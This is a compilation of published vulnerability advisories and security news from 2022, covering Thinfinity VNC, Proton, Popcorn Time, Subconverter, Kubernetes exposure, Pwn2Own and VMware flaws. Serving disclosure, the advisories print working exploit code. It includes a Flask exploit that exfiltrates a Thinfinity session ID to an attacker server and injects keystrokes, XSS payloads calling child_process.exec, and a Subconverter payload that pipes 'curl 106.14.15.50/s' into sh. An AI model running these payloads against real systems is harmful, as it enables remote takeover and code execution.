Thinfinity VNC v4.0.0.1 contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can trick a user into browse malicious site, to obtain an 'ID' that can be used to send websocket requests and achieve RCE.

**Summary**

**Name**

Thinfinity VNC v4.0.0.1 - CORS Misconfiguration to RCE

**Code name**

Clapton

**Product**

Thinfinity VNC

**Affected versions**

v4.0.0.1

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

CORS Misconfiguration

**Rule**

134\. Insecure or unset HTTP headers - CORS

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

**CVSSv3 Base Score**

8.3

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-25227

**Description**

Thinfinity VNC v4.0.0.1 contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can trick a user into browse malicious site, to obtain an ID that can be used to send websocket requests and achieve RCE.

**Proof of Concept**

1.  Create a malicious site with the following content and send it to the victim.
    
        <!DOCTYPE html>
        <html>
        <body>
        <center>
        <h2>CORS Thinfinity POC Exploit</h2>
        <h3>Extract ID</h3>
        
        <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
        </div>
        
        <script>
        function cors() {
        
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
        
                response = JSON.parse(this.responseText)
                id_str = response['id']
        
                id_str = id_str.slice(1, id_str.length - 1)
        
                alert("Exfiltrated ID: " + id_str)
                alert("Do you want to send the exploit?")
        
                const flask_http = new XMLHttpRequest();
        
                // Server to exfiltrate the websocket id
        
                // CHANGE THIS
                var exf_server = "127.0.0.1:5000"
                const url = "http://" + exf_server + "/cors?id=" + id_str
        
        
                // Send ID to flask application
                flask_http.open("GET", url)
                flask_http.send()
        
                flask_http.onreadystatechange = function() {
                        alert('Done!!!')
                }
        
            }
        };
        
        // exfiltrate ID using CORS vulnerability
        
        // CHANGE THIS
        
        var server = "172.16.28.140:8081"
        xhttp.open("GET", "http://" + server + "/vnc/cmd?cmd=connect&wscompression=true&destAddr=&screenWidth=1308&screenHeight=741&orientation=90&browserWidth=654&browserHeight=627&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supportsFullScreen=true&webapp=false", true);
        xhttp.withCredentials = true;
        xhttp.send();
        }
        
        
        </script>
        
        </body>
        </html>
        
    
2.  Create a web socket connection against the target server using the exfiltrated ID. The following PoC sends the Ctrl+Esc keystroke combination to the server.
    
        from websocket import create_connection
        import time
        
        # CHANGE THIS
        id_str ="D6647736-7489-4FA3-9620-25F2DC7FA1F6"
        
        ws = create_connection("ws://172.16.28.140:8081/vnc/%7B" + id_str + "%7D")
        command = "cmd=fkey&key=CtrlEsc&id={" + id_str + "}"
        ws.send(command)
        
    
3.  The exploit below can be used to send arbitrary commands to the server after the ID is exfiltrated. It uses the ID to hijack the VNC connection and send keystrokes or mouse moves to the server.
    

**Exploit**

*   Run the flask application and trick a user with a session in Thinfinity to visit the page.

    
    # export FLASK_APP=exploit_thinfinity
    # flask run --host=0.0.0.0
    
    from flask import Flask, request, redirect
    from websocket import create_connection
    import time
    import socket
    
    app = Flask(__name__)
    
    
    # CHANGE THIS
    server = "192.168.1.7:8081"
    
    
    def current_ip():
        return([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0])
    
    
    def send_enter(ws, str_id):
        ws.send("cmd=keyb&key=13&char=0&action=down&id={" + str_id + "}")
        time.sleep(1)
    
    def send_ctrl_esc(ws, str_id):
        ws.send("cmd=fkey&key=CtrlEsc&id={%s}" % str_id)
        time.sleep(1)
    
    def send_text(ws, cmd, str_id):
    
        for c in cmd:
            key = str(ord(c))
    
            command  = "cmd=keyb&key=66&action=down&id={%s}&char=%s&location=0" % (str_id,key)
            ws.send(command)
            time.sleep(0.2)
    
        time.sleep(2)
    
    
    @app.route("/exploit")
    def about():
    
        ip = request.host.split(':')[0]
    
        return """
            <!DOCTYPE html>
            <html>
            <body>
            <center>
            <h2>CORS Thinfinity POC Exploit</h2>
            <h3>Extract ID</h3>
    
            <div id="demo">
            <button type="button" onclick="cors()">Exploit</button>
            </div>
    
            <script>
            function cors() {
    
            var xhttp = new XMLHttpRequest();
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
    
                    response = JSON.parse(this.responseText)
                    id_str = response['id']
    
                    id_str = id_str.slice(1, id_str.length - 1)
    
                    alert("Exfiltrated ID: " + id_str)
                    alert("Do you want to send the exploit?")
    
                    const flask_http = new XMLHttpRequest();
    
                    // Server to exfiltrate the websocket id
    
                    // CHANGE THIS
                    var exf_server = "%s:5000"
                    const url = "http://" + exf_server + "/cors?id=" + id_str
    
    
                    // Send ID to flask application
                    flask_http.open("GET", url)
                    flask_http.send()
    
                    flask_http.onreadystatechange = function() {
                            alert('Done!!!')
                    }
    
                }
            };
    
            // exfiltrate ID using CORS vulnerability
    
            // CHANGE THIS
    
            var server = "%s"
            xhttp.open("GET", "http://" + server + "/vnc/cmd?cmd=connect&wscompression=true&destAddr=&screenWidth=1308&screenHeight=741&orientation=90&browserWidth=654&browserHeight=627&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supportsFullScreen=true&webapp=false", true);
            xhttp.withCredentials = true;
            xhttp.send();
            }
    
    
            </script>
            </body>
            </html>
        """ % (ip, server)
    
    
    @app.route('/cors',methods=['GET'])
    def cors():
        str_id = request.args.get('id')
        print(str_id)
    
    
    
        socket_url = "ws://" + server +  "/vnc/%7B"+ str_id +"%7D"
        ws = create_connection(socket_url)
    
        send_ctrl_esc(ws,str_id)
    
        send_text(ws,"run",str_id)
        send_enter(ws,str_id)
    
        send_text(ws,"calc.exe",str_id)
        send_enter(ws,str_id)
    
        return str_id
    
    @app.route("/")
    def index():
        return redirect('/exploit')
    

**Mitigation**

By 2022-05-17 there is not a patch resolving the issue.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://www.cybelesoft.com/thinfinity/

**Timeline**

2022-04-11

Vulnerability discovered.

2022-04-11

Vendor contacted.

2022-05-17

Public Disclosure.

CVE-2022-25227: Thinfinity VNC v4.0.0.1 - CORS Misconfiguration to RCE | Fluid Attacks

**Summary**

**Name**

Proton v0.2.0 - XSS To RCE

**Code name**

Lennon

**Product**

Proton Markdown

**Affected versions**

Version 0.2.0

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

XSS to RCE

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

**CVSSv3 Base Score**

7.1

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25224

**Description**

Proton **v0.2.1** allows an attacker to create a malicious link inside a markdown file. When the victim clicks the link, the application opens the site in the current frame allowing an attacker to host JavaScript code in the malicious link in order to trigger an XSS attack. The nodeIntegration configuration is set to **on** which allows the webpage to use NodeJs features, an attacker can leverage this to run OS commands.

**Proof of Concept****Steps to reproduce**

1.  Create a markdown file with the following content.
    
        [Click me!!!](http://192.168.1.67:8002/rce.html)
        
    
2.  Host the rce.html file with the following content on a server controlled by the attacker.
    
         <script>
             require('child_process').exec('calc');
         </script>
        
    
3.  Send the markdown file to the victim. When the victim clicks the markdown link the site will be open inside electron and the JavaScript code will spawn a calculator.
    

**System Information**

*   Version: Proton v0.2.1.
*   Operating System: Windows 10.0.19042 N/A Build 19042.
*   Installer: Proton.Setup.0.2.0.exe

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

By 2022-05-17 there is not a patch resolving the issue.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/steventhanna/proton/

**Timeline**

2022-04-29

Vulnerability discovered.

2022-04-29

Vendor contacted.

2022-05-17

Public Disclosure.

CVE-2022-25227: Proton v0.2.0 - XSS To RCE | Fluid Attacks

Popcorn Time 0.4.7 has a Stored XSS in the 'Movies API Server(s)'' field via the 'settings' page. The 'nodeIntegration' configuration is set to on which allows the webpage to use 'NodeJs' features, an attacker can leverage this to run OS commands.

1.  Home
2.  Advisories
3.  Popcorn Time 0.4.7 XSS to RCE

**Summary**

**Name**

Popcorn Time 0.4.7 - XSS to RCE

**Code name**

Bowie

**Product**

Popcorn Time

**Affected versions**

Version 0.4.7 (Just Keep Swimming)

**State**

Public

**Release date**

2022-05-17

**Vulnerability**

**Kind**

XSS to RCE

**Rule**

010\. Stored cross-site scripting (XSS)

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N

**CVSSv3 Base Score**

7.7

**Exploit available**

No

**CVE ID(s)**

CVE-2022-25229

**Description**

Popcorn Time 0.4.7 has a Stored XSS in the Movies API Server(s) field via the settings page. The nodeIntegration configuration is set to **on** which allows the webpage to use NodeJs features, an attacker can leverage this to run OS commands.

**Proof of Concept****Steps to reproduce**

1.  Open the Popcorn time application.
    
2.  Go to settings.
    
3.  Enable Show advanced settings.
    
4.  Scroll down to the API Server(s) section.
    
5.  Insert the following PoC inside the Movies API Server(s) field and click on Check for updates.
    

    a"><script>require('child_process').exec('calc');</script>
    

6.  Scroll down to the Database section and click on Export database.
    
7.  The application will create a .zip file with the current configuration.
    
8.  Send the configuration to the victim.
    
9.  The victim must go to Settings -> Database and click on Import Database
    
10.  When the victim restarts the application the XSS will be triggered and will run the calc command.
    

**System Information**

*   Version: Popcorn Time 0.4.7.
*   Operating System: Windows 10.0.19042 N/A Build 19042.
*   Installer: Popcorn-Time-0.4.7-win64-Setup.exe

**Exploit**

There is no exploit for the vulnerability but can be manually exploited.

**Mitigation**

An updated version of PopcornTime is available at the vendor page.

**Credits**

The vulnerability was discovered by Oscar Uribe from the Offensive Team of Fluid Attacks.

**References**

**Vendor page** https://github.com/popcorn-official/popcorn-desktop

**Issue** https://github.com/popcorn-official/popcorn-desktop/issues/2491

**Timeline**

2022-04-26

Vulnerability discovered.

2022-04-26

Vendor contacted.

2022-05-04

Vendor Confirmed the vulnerability.

2022-05-07

Vulnerability patched.

2022-05-17

Public Disclosure.

CVE-2022-25229: Popcorn Time 0.4.7 - XSS to RCE | Fluid Attacks

More than 380,000 of the 450,000-plus servers hosting the open-source container-orchestration engine for managing cloud deployments allow some form of access.

More than 380,000 of the 450,000-plus servers hosting the open-source container-orchestration engine for managing cloud deployments allow some form of access.

More than 380,000 Kubernetes API servers allow some kind of access to the public internet, making the popular open-source container-orchestration engine for managing cloud deployments an easy target and broad attack surface for threat actors, researchers have found.

The Shadowserver Foundation discovered the access when it scanned the internet for Kubernetes API servers, of which there are more than 450,000, according to a blog post published this week.

“ShadowServer is conducting daily scans of the IPv4 space on ports 443 and 6443, looking for IP addresses that respond with an ‘HTTP 200 OK status,’ which indicates that the request has succeeded,” according to the post.

Of the more than 450,000 Kubernetes API instances identified by Shadowserver, 381,645 responded with “200 OK,” researchers said. In all, Shadowserver found 454,729 Kubernetes API servers. The “open” API instances thus constitute nearly 84 percent of all instances that that Shadowserver scanned.

Moreover, most of the accessible Kubernetes servers—201,348, or nearly 53 percent–were found in the United States, according to the post.

While this response to the scan does not mean these servers are fully open or vulnerable to attacks, it does create a scenario in which the servers have an “unnecessarily exposed attack surface,” according to the post.

“This level of access was likely not intended,” researchers observed. The exposure also allows for information leakage on version and builds, they added.

****Cloud Under Attack****

The findings are troubling given that attackers already increasingly have been targeting Kubernetes cloud clusters as well as using them to launch other attacks against cloud services. Indeed, the cloud historically has suffered from rampant misconfiguration that continues to plague deployments, with Kubernetes being no exception.

In fact, Erfan Shadabi, cybersecurity expert with data-security firm comforte AG, said in an email to Threatpost that he was not surprised that the Shadowserver scan turned up so many Kubernetes servers exposed to the public internet.

“White \[Kubernetes\] provides massive benefits to enterprises for agile app delivery, there are a few characteristics that make it an ideal attack target for exploitation,” he said. “For instance, as a result of having many containers, Kubernetes has a large attack surface that could be exploited if not pre-emptively secured.”

****Open-Source Security Exposed****

The findings also raise the perennial issue of how to build security into open-source systems that become ubiquitous as part of modern internet and cloud-based infrastructure, making an attack on them an attack on the myriad systems to which they are connected.

This issue was highlighted all-too-unfortunately in the case of the Log4Shell vulnerability in the ubiquitous Java logging library Apache Log4j that was discovered last December.

The flaw, which is easily exploitable and can allow unauthenticated remote code execution (RCE) and complete server takeover–continues to be targeted by attackers. In fact,  a recent report finding millions of Java applications still vulnerable despite a patch being available for Log4Shell.

An Achilles heel in particular of Kubernetes is that the data-security capabilities built into the platform are only at a “bare minimum”–protecting data at rest and data in motion, Shadabi said. In a cloud environment, this is a dangerous prospect.

“There’s no persistent protection of data itself, for example using industry accepted techniques like field-level tokenization,” he observed. “So if an ecosystem is compromised, it’s only a matter of time before the sensitive data being processed by it succumbs to a more insidious attack.”

Shadabi’s advice to organizations that use containers and Kubernetes in their production environments is to take securing Kubernetes as seriously as they do all aspects of their IT infrastructure, he said.

For its part, Shadowserver recommended that if administrators find that a Kubernetes instance in their environment is accessible to the internet, they should consider implementing authorization for access or block at the firewall level to reduce the exposed attack surface.

380K Kubernetes API Servers Exposed to Public Internet

By Waqas
Other than Windows 11, Microsoft Teams and Mozilla Firefox, Oracle Virtualbox, Ubuntu Desktop, and Safari browser were also…
This is a post from HackRead.com Read the original post: Pwn2Own 2022 – Windows 11, MS Teams and Firefox Pwned on Day 1

Other than Windows 11, Microsoft Teams and Mozilla Firefox, Oracle Virtualbox, Ubuntu Desktop, and Safari browser were also hacked on day one of PWN2OWN 2022 in Vancouver.

Pwn2Own is a hacking contest where white hate hackers come forward and compete against each other and earn thousands of dollars for detecting unknown vulnerabilities in popular software/OS. On the first day of the 15th edition of Pwn2Own, vulnerability researchers earned around $800,000.

According to the event organizer, Trend Micro’s Zero Day Initiative (ZDI), this was the highest single-day award amount ever won in this contest. All the ten hacking attempts were successful. The competition will conclude on Friday.

It is worth noting that this is the second edition of Pwn2Own in 2022. The first edition was held in Miami and focused mainly on ICS (industrial control systems). Participants earned $400,000 for successful exploits.

**Microsoft Teams Exploits “Stole” the Show**

Around $450,000 out of the total awarded sum of $800,000 was won by hackers who detected vulnerabilities in Microsoft Teams. Hackers exploited sixteen zero-day vulnerabilities against Windows 11, MS Teams, Firefox, Ubuntu, Oracle VirtualBox, and Safari. Hackers will again target Teams on the last day of Pwn2Own, on Friday.

For MS Teams, $150,000 were awarded for each of the 3 exploit chains leveraged by Masato Kinugawa, Hector Peralta (p3rr0), and the STAR Labs team comprising Billy Jheng Bing-Jhong, Muhammad Alifa Ramdhan, and Nguyễn Hoàng Thạch.

According to ZDI’s blog post, Peralta demonstrated an improper configuration. Kinugawa exploited a 3-bug chain, including a sandbox escape, a configuration, and an injection, while the STAR Labs team leveraged an arbitrary file write flaw and injection using a zero-click remote code execution exploit on Oracle VirtualBox.

**More Pwn and Bug Bounty News**

1.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
2.  Hack the US Army for good with ‘Hack The Army’ bug bounty program
3.  Microsoft Exchange server, Teams, Zoom, Chrome pwned at Pwn2Own
4.  Xiaomi, Amazon Echo, Sony & Samsung Smart TVs pwned at Pwn2Own
5.  iPhone 13 Pro, Windows, Chrome, Linux and others pwned at Tianfu Cup

**Other Successful Exploits**

Manfred Paul won $100,000 for identifying a sandbox escape exploit in Mozilla Firefox, which involved improper input validation and prototype pollution, and an additional $50,000 for an out-of-band write on Apple Safari.

Other hackers won $40,000 each for the rest of the exploits. This includes Marcin Wiązowski, who executed an out-of-bounds write privilege escalation on MS Windows 11. Team Orca of Sea Security executed two bugs on the Ubuntu desktop, STAR Labs’ Phan Thanh Duy and Lê Hữu Quang Linh exploited MS Windows 11 with a Use-After-Free elevation of privilege. Keith Yeo performed a Use-After-Free exploit on Ubuntu Desktop.

On Thursday, Pwn2Own’s second day, researchers will hack a Tesla Model 3, and successful attempts will grant them up to a $600,000 bounty plus a new Tesla.

**_Did you enjoy reading this article? Do like our page on Facebook and follow us on Twitter._**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Pwn2Own 2022 – Windows 11, MS Teams and Firefox Pwned on Day 1

A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows attackers to execute arbitrary code via crafted config and url parameters.

Software Link(Subconverter): https://github.com/tindy2013/subconverter

Affected versions: Subconverter v0.7.2, < v0.7.2-ce8d2bd

**Description**

A remote code execution (RCE) vulnerability in Subconverter v0.7.2 allows unauthorized attackers to execute arbitrary code via crafted config and url parameters.

Unauthorized attackers can use this vulnerability to leak the authorize token and become authorized user, or leak other user's privacy info, or even taking down the server.

**Steps to reproduce**

*   1.  Host a evil JavaScript file with HTTP, with a function named parse(x). os.exec from quickjs can be used to call system commands.
    
    //http://106.14.15.50/testxz.js
    
    function parse(x){
            os.exec(\["sh","-c","curl 106.14.15.50/s|sh"\],{file:"sh"})
    }
    
*   2.  Calculate the md5 for the evil JavaScript file URL. For example: The md5 of http://106.14.15.50/testxz.js is c10dca9bf2e82a5ec6293ceba3cee6bc.
*   3.  Access the remote server with crafted config and url parameters, twice. The first time we access, the evil JavaScript file will be downloaded to ./cache/<md5_of_evil_js_url>. The second time we access, the evil JavaScript from cache will be loaded and the parse(x) function in evil JavaScript will be called.
        
        # http://SERVER\_IP/sub?config=<evil\_js\_url>&target=clash&url=script:cache/<md5\_of\_evil\_js\_url>,114514
        
        curl 'http://SERVER\_IP/sub?config=http://106.14.15.50/testxz.js&target=clash&url=script:cache/c10dca9bf2e82a5ec6293ceba3cee6bc,114514'
        curl 'http://SERVER\_IP/sub?config=http://106.14.15.50/testxz.js&target=clash&url=script:cache/c10dca9bf2e82a5ec6293ceba3cee6bc,114514'
        
*   4.  We can see that the code in evil JavaScript file is executed, the reverse shell has taken place.
        

**Fix**

Subconverter v0.7.2-ce8d2bd has fixed this issue by only allowing authorized user or when the server is running with config api_mode = false (insecure mode, assumes any user is authorized) to use script: URL.

If you are using a Subconverter version below v0.7.2-ce8d2bd, you should upgrade to v0.7.2-ce8d2bd or higher to fix the RCE vulnerability. If you are not able to upgrade, you can set enable_cache = false in your config file and clear local ./cache folder to mitigate the vulnerability. Be aware though this will disable caching and may cost you more bandwidth.

It is recommended that you change your api_access_token as well as it may already be compromised.

NOTE: It is still possible to RCE on v0.7.2-ce8d2bd by authorized user or when the server is running with config api_mode = false , this is confirmed to be 'not a vulnerability' by the author.

CVE-2022-28927: Subconverter v0.7.2 unauthorized RCE

CISA orders US federal agencies to implement patches ASAP

John Leyden 19 May 2022 at 15:14 UTC

CISA orders US federal agencies to implement patches ASAP

US Federal agencies have been instructed to either immediately patch or temporarily deactivate a set of enterprise products from VMware in response to “active and expected exploitation of multiple vulnerabilities”.

An emergency directive from the US Cybersecurity and Infrastructure Security Agency (CISA) urges patching of VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

If prompt patching is impractical then federal agencies are instructed to remove instances of vulnerable products from agency networks.

**Act fast**

Attackers have reverse engineered recently disclosed software vulnerabilities in the various VMware products in order to develop exploits and attack unpatched systems.

The tactic has already resulted in active exploitation of CVE-2022-22954 and CVE-2022-22960, with more abuse along the same lines likely to follow.

YOU MIGHT ALSO LIKE Popular websites leaking user email data to web tracking domains

“Based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973, which were disclosed by VMware on May 18, 2022,” an alert from the agency warns.

In a related advisory issued by VMware on Wednesday (May 18), the vendor explained that it had patched an authentication bypass vulnerability (CVE-2022-22972) and a local privilege escalation vulnerability (CVE-2022-22973) involving VMware Workspace ONE Access, VMware Identity Manager, VMware vRealize Automation, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

The CVE-2022-22954 vulnerability already under active attack involves a server-side template injection vulnerability in VMware Workspace ONE Access and Identity Manager that poses a remote code execution risk. The flaw earned a CVSS score of 9.8, close to the maximum possible.

Catch up on the latest cyber-attack news

The CVE-2022-22960 flaw involves a lesser but still high-risk privilege escalation vulnerability involving VMware Workspace ONE Access, Identity Manager, and vRealize Automation.

Both flaws have come under active attack, just days after the release of patches, security vendor Barracuda Networks reports:

The vast majority of the attacks came in from the US geographically, with most of them coming in from data centers and cloud providers. While the spikes are largely from these IP ranges, there are also consistent background attempts from known bad IPs in Russia. Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes.

The motive behind the attacks remains unclear.

Although the unusual emergency action advisory is primarily directed at US federal agencies, CISA is urging other enterprise organizations to either update or remove installations of the affected products from their networks.

Vulnerable, internet-accessible installations of affected products should be treated as already potentially compromised, CISA adds.

RECOMMENDED Rogue cloud users could sabotage fellow off-prem tenants via critical Flux flaw

Active attacks against VMware flaws prompts emergency update directive

Mischief-makers could ‘disrupt the availability, integrity and confidentiality’ of other tenants

Mischief-makers could ‘disrupt the availability, integrity and confidentiality’ of other tenants

A critical vulnerability in Flux2, the continuous delivery (CD) tool for Kubernetes, can enable rogue tenants in multi-tenancy deployments to sabotage ‘neighbors’ using the same off-premise infrastructure.

Flux is an open and extensible CD solution for keeping Kubernetes clusters in sync with configuration sources, and is used by Maersk, Volvo, SAP, Deutsche Telekom, and Grafana Labs, among other companies.

As version 2 of the tool, Flux2 introduced multi-tenancy support, among other features.

**Improper kubeconfig validation**

Now patched, the remote code execution (RCE) flaw arises through improper validation of kubeconfig files, which “can define commands to be executed to generate on-demand authentication tokens”, according to a security advisory posted on GitHub on Tuesday (May 17).

“Flux2 can reconcile the state of a remote cluster when provided with a kubeconfig file with the correct access rights.”

RELATED DevSecOps and cybersecurity skills are top priorities for enterprise IT – report

Paulo Gomes, senior software engineer at Weaveworks, a Cloud Native Computing Foundation (CNCF) member company that originated GitOps and provides support for Flux and Kubernetes, elaborated: “Flux can synchronize the declared state defined in a Git repository against the cluster in which it is installed, which is the most commonly used approach. Or it can target a remote cluster instead,” he told The Daily Swig.

“The access required for targeting remote clusters largely depends on the intended scope. This is completely flexible and relies on Kubernetes’ RBAC having a wide range of granularity (from a single resource to the entire cluster).”

The upshot, according to the advisory, is that “a malicious user with write access to a Flux source or direct access to the target cluster, could craft a kubeconfig to execute arbitrary code inside the controller’s container”.

**CVSS disparity**

The vulnerability is considerably less dangerous in single-tenant cloud deployments, which accounts for it scoring only 6.8 under the older, CVSS v2 rating system, making the bug medium severity.

“The reason being, an attacker would require almost the same amount of privileges it would gain by exploiting it,” said Gomes.

Catch up with the latest cloud security news

However, the flaw is rated 9.9 according to the latest CVSS version, v3.1, since it introduced a metric around changes of ‘scope’, and – as First describes the ‘changed’ scope metric – the “vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component”.

This is because attackers can also achieve privilege escalation to cluster admin in multi-tenancy environments, provided that the controller’s service account has elevated permissions.

“In the worse-case scenario, a rogue tenant could disrupt the availability, integrity and confidentiality of other tenants,” said Gomes. “The impact would depend on how the cluster and tenants were configured.

“Theoretically, a rogue tenant could deploy applications into other tenants’ clusters for example. But the impact could be reduced by other security controls in place (i.e. admission controllers, OPA, etc).”

**Patches and workarounds**

This vulnerability, which was discovered by the maintainers of Flux, was fixed in Flux2 version v0.29.0, and in Kubernetes operators kustomize-controller (patched in v0.23.0) and helm-controller (v0.19.0).

“Starting from the fixed versions, both controllers disable the use of command execution from kubeconfig files by default, \[so\] users have to opt-in by adding the flag to the controller’s command arguments,” explains the advisory.

“Users are no longer allowed to refer to files in the controller’s filesystem in the kubeconfig files provided for the remote apply feature.”

In lieu of applying updates, users can protect themselves by disabling the vulnerable functionality via Validating Admission webhooks such as OPA Gatekeeper or Kyverno.

They can also apply restrictive AppArmor and SELinux profiles on the controller’s pod to limit which binaries can be executed.

DON’T FORGET TO READ Brace of Icinga web vulnerabilities ‘easily chained’ to hack IT monitoring software

Rogue cloud users could sabotage fellow off-prem tenants via critical Flux flaw

CISA has issued severe warnings about disclosed vulnerabilities in VMWare products that are actively being exploited, probably by APT threat actors.
The post VMWare vulnerabilities are actively being exploited, CISA warns appeared first on Malwarebytes Labs.

The Cybersecurity & Infrastructure Security Agency has issued an Emergency Directive ED 22-03 and released a Cybersecurity Advisory (CSA) about ongoing, and expected exploitation of multiple vulnerabilities in several VMware products.

**Chaining unpatched VMware vulnerabilities**

The title of the advisory is “Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control”. That’s a bit confusing since there are patches available for these vulnerabilities, but threat actors are actively attacking unpatched systems.

The advisory warns organizations that malicious threat actors, most likely advanced persistent threat (APT) actors, are exploiting CVE-2022-22954 and CVE-2022-22960 separately and in combination.

**CVE-2022-22954**: VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.

Server-side template injection is when an attacker is able to inject a malicious payload into a template, which is then executed server-side.

**CVE-2022-22960**: VMware Workspace ONE Access, Identity Manager, and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to root.

Both these vulnerabilities were patched on April 6, 2022. But it took malicious threat actors less than 48 hours to reverse engineer the vendor updates to develop an exploit and start exploiting these disclosed vulnerabilities in unpatched devices.

On May 18, 2022, CISA said it expects malicious threat actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973 as well.

**CVE-2022-22972**: is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager and vRealize Automation that affects local domain users. In order to exploit this vulnerability, a remote attacker capable of accessing the respective user interface could bypass the authentication for these various products.

**CVE-2022-22973**: is a local privilege escalation vulnerability in the VMware Workspace ONE Access and Identity Manager. In order to exploit this vulnerability, an attacker would need to have local access to the vulnerable instances of Workspace ONE Access and Identity Manager. Successful exploitation would allow an attacker to gain “root” privileges.

**Mitigation**

CISA strongly encourages all organizations to deploy the updates provided in VMware Security Advisory VMSA-2022-0014 or remove those instances from networks. CISA added CVE-2022-22954 and CVE-2022-22960 to its catalog of known exploited vulnerabilities, and federal, executive branch, departments, and agencies were all required to patch those vulnerabilities by May 5 and May 6 respectively. It stands to reason that the two new vulnerabilities will follow suit.

CISA encourages organizations with affected VMware products that are accessible from the Internet to assume they have been compromised and to initiate threat hunting activities. To help with the threat hunting, CISA has provided detection methods and indicators of Compromise (IOCs) in the CSA.

In the Response Matrix, as listed in the VMWare advisory, you can find the impacted products and versions.

VMWare vulnerabilities are actively being exploited, CISA warns

VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks.
The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior

VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks.

The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication.

CVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local privilege escalation that could enable an attacker with local access to elevate privileges to the "root" user on vulnerable virtual appliances.

"It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments," VMware said.

The disclosure follows a warning from the U.S. Cybersecurity and Infrastructure Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 — two other VMware flaws that were fixed early last month — separately and in combination.

"An unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user," it said. "The actor then exploited CVE-2022-22960 to escalate the user's privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems."

On top of that, the cybersecurity authority noted that threat actors have deployed post-exploitation tools such as the Dingo J-spy web shell in at least three different organizations.

IT security company Barracuda Networks, in an independent report, said it has observed consistent probing attempts in the wild for CVE-2022-22954 and CVE-2022-22960 soon after the shortcomings became public knowledge on April 6.

More than three-fourths of the attacker IPs, about 76%, are said to have originated from the U.S., followed by the U.K. (6%), Russia (6%), Australia (5%), India (2%), Denmark (1%), and France (1%).

Some of the exploitation attempts recorded by the company involve botnet operators, with the threat actors leveraging the flaws to deploy variants of the Mirai distributed denial-of-service (DDoS) malware.

The issues have also prompted CISA to issue an emergency directive urging federal civilian executive branch (FCEB) agencies to apply the updates by 5 p.m. EDT on May 23 or disconnect the devices from their networks.

"CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products," the agency said.

The patches arrive a little over a month after the company rolled out an update to resolve a critical security flaw in its Cloud Director product (CVE-2022-22966) that could be weaponized to launch remote code execution attacks.

**CISA warns of active exploitation of F5 BIG-IP CVE-2022-1388**

It's not just VMware that's under fire. The agency has also released a follow-up advisory with regards to the active exploitation of CVE-2022-1388 (CVSS score: 9.8), a recently disclosed remote code execution flaw affecting BIG-IP devices.

CISA said it expects to "see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#rce